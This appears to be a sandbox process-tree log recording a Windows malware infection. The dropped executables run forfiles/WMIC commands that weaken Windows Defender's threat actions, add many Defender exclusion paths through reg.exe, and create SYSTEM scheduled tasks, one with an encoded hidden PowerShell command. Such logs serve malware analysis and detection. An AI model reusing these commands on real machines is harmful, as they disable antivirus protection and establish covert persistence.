C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\OUoOAMiL\rqjwLsg.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\OUoOAMiL\rqjwLsg.exe JB /S2⤵PID:7112
-
-
C:\Users\Admin\AppData\Local\3f199502-c8bb-4b0f-8f8d-4083e50d75c9\77F.exeC:\Users\Admin\AppData\Local\3f199502-c8bb-4b0f-8f8d-4083e50d75c9\77F.exe --Task2⤵PID:3124
-
C:\Users\Admin\AppData\Local\3f199502-c8bb-4b0f-8f8d-4083e50d75c9\77F.exeC:\Users\Admin\AppData\Local\3f199502-c8bb-4b0f-8f8d-4083e50d75c9\77F.exe --Task3⤵PID:3912
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session2⤵PID:4072
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feeaca4f50,0x7feeaca4f60,0x7feeaca4f703⤵PID:5924
-
-
-
C:\Users\Admin\AppData\Roaming\bfabswaC:\Users\Admin\AppData\Roaming\bfabswa2⤵PID:1224
-
-
C:\Users\Admin\AppData\Roaming\cuabswaC:\Users\Admin\AppData\Roaming\cuabswa2⤵PID:5628
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6396 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6476
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D9DCDE88-6D51-4526-9440-BC66E16D750A} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:6660
-
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\AHDUOqG.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\AHDUOqG.exe tt /site_id 394347 /S2⤵PID:6332
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:6956
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:5652
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:5656
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:4052
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:5440
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:1224
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:6612
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:5444
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:5656
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTTsssWlv" /SC once /ST 02:04:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTTsssWlv"3⤵PID:1084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTTsssWlv"3⤵PID:2576
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:323⤵PID:6384
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:324⤵PID:5584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:643⤵PID:6428
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:644⤵PID:6480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:323⤵PID:3332
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:324⤵PID:5536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:643⤵PID:6484
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:644⤵PID:456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\laRuxdflOdEFherP\EXPKqfXh\xJxzRbvVwJmEKptp.wsf"3⤵PID:4884
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\laRuxdflOdEFherP\EXPKqfXh\xJxzRbvVwJmEKptp.wsf"3⤵PID:6024
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR" /t REG_DWORD /d 0 /reg:324⤵PID:5896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR" /t REG_DWORD /d 0 /reg:644⤵PID:4320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIBxqmZBU" /t REG_DWORD /d 0 /reg:644⤵PID:4448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIBxqmZBU" /t REG_DWORD /d 0 /reg:324⤵PID:760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fSairMrhYOPU2" /t REG_DWORD /d 0 /reg:324⤵PID:4844
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIBxqmZBU" /t REG_DWORD /d 0 /reg:644⤵PID:6088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dIBxqmZBU" /t REG_DWORD /d 0 /reg:324⤵PID:2600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fSairMrhYOPU2" /t REG_DWORD /d 0 /reg:644⤵PID:5180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iOPoQDDXUfpqC" /t REG_DWORD /d 0 /reg:644⤵PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZVOHfyaZMUn" /t REG_DWORD /d 0 /reg:324⤵PID:4284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qLBAJgyZHGjWrPVB" /t REG_DWORD /d 0 /reg:644⤵PID:6036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa" /t REG_DWORD /d 0 /reg:644⤵PID:3436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:644⤵PID:4916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:324⤵PID:5800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa" /t REG_DWORD /d 0 /reg:324⤵PID:6708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qLBAJgyZHGjWrPVB" /t REG_DWORD /d 0 /reg:324⤵PID:6648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZVOHfyaZMUn" /t REG_DWORD /d 0 /reg:644⤵PID:5436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iOPoQDDXUfpqC" /t REG_DWORD /d 0 /reg:324⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fSairMrhYOPU2" /t REG_DWORD /d 0 /reg:324⤵PID:6084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR" /t REG_DWORD /d 0 /reg:644⤵PID:5420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR" /t REG_DWORD /d 0 /reg:324⤵PID:4776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:644⤵PID:7012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\laRuxdflOdEFherP" /t REG_DWORD /d 0 /reg:324⤵PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa" /t REG_DWORD /d 0 /reg:644⤵PID:5520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa" /t REG_DWORD /d 0 /reg:324⤵PID:5708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qLBAJgyZHGjWrPVB" /t REG_DWORD /d 0 /reg:644⤵PID:6620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\qLBAJgyZHGjWrPVB" /t REG_DWORD /d 0 /reg:324⤵PID:2336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZVOHfyaZMUn" /t REG_DWORD /d 0 /reg:644⤵PID:5356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oZVOHfyaZMUn" /t REG_DWORD /d 0 /reg:324⤵PID:4164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iOPoQDDXUfpqC" /t REG_DWORD /d 0 /reg:644⤵PID:5220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iOPoQDDXUfpqC" /t REG_DWORD /d 0 /reg:324⤵PID:4020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fSairMrhYOPU2" /t REG_DWORD /d 0 /reg:644⤵PID:4828
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fHOlMGNmDutpzGekG" /SC once /ST 03:23:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\ZqaRohD.exe\" Nv /site_id 394347 /S" /V1 /F3⤵
- Creates scheduled task(s)
PID:3916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fHOlMGNmDutpzGekG"3⤵PID:7160
-
-
-
C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\AHDUOqG.exeC:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\AHDUOqG.exe tt /site_id 394347 /S2⤵PID:6556
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:6948
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:5768
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:3588
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:4456
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:6300
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
- Executes dropped EXE
PID:1576
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:2604
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:2620
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:3080
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:2376
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:3552
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:6740
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "fHOlMGNmDutpzGekG" /SC once /ST 00:05:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\hVHJlIV.exe\" Nv /site_id 394347 /S" /V1 /F3⤵
- Creates scheduled task(s)
PID:7148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "fHOlMGNmDutpzGekG"3⤵PID:1732
-
-
-
C:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\ZqaRohD.exeC:\Windows\Temp\laRuxdflOdEFherP\ucdSBUUSaCLPRkL\ZqaRohD.exe Nv /site_id 394347 /S2⤵PID:6888
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:6224
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:3008
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:2412
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:4800
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:3984
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:308
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:3300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:6404
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bOoGaaDxESFbryPOAb"3⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:816
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:6652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4776
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:5420
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\dIBxqmZBU\RuLePp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JnrJAucJILlcMMe" /V1 /F3⤵
- Creates scheduled task(s)
PID:4508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JnrJAucJILlcMMe2" /F /xml "C:\Program Files (x86)\dIBxqmZBU\Lhtocrb.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:4848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "JnrJAucJILlcMMe"3⤵PID:5920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "JnrJAucJILlcMMe"3⤵PID:5396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OMsCZDeJImgVgl" /F /xml "C:\Program Files (x86)\fSairMrhYOPU2\TWuhNmZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:6156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uZdEDCeaKQjVo2" /F /xml "C:\ProgramData\qLBAJgyZHGjWrPVB\hxBAnyl.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FNTeCqGkBmjmyLdgG2" /F /xml "C:\Program Files (x86)\VqGHeIeUCewIVtFOQeR\JzLkBmb.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:5600
-
-
